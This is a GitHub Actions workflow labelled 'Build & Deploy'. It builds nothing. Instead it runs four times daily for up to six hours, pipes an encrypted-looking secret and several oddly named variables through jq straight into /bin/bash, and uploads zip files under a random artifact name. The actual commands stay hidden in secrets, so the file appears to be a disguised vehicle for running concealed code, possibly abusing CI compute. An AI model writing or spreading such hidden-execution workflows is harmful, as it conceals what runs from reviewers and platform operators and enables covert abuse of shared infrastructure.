name: Build & Deploy
on:
  workflow_dispatch:

  schedule:
    - cron: '57 4,10,16,22 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  run:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Build and run
        env:
          zeo8086: ${{ secrets.zeo8086 }}
        run: |
          printf '%s' "$zeo8086" | jq -r .mge5985 | /bin/bash
          printf '%s' "$ssx84" | jq -r .esau70 | /bin/bash
          echo $jiosf04504 | jq -r .w59310 | /bin/bash
          echo $gk6054 | jq -r .fmrf17 | /bin/bash
          printf '%s' "$sp0" | jq -r .prcw36 | /bin/bash
          echo $egi495 | jq -r .du33753 | /bin/bash

      - name: Save output
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: z7ST5Gc6
          path: "*.zip"
          retention-days: 1
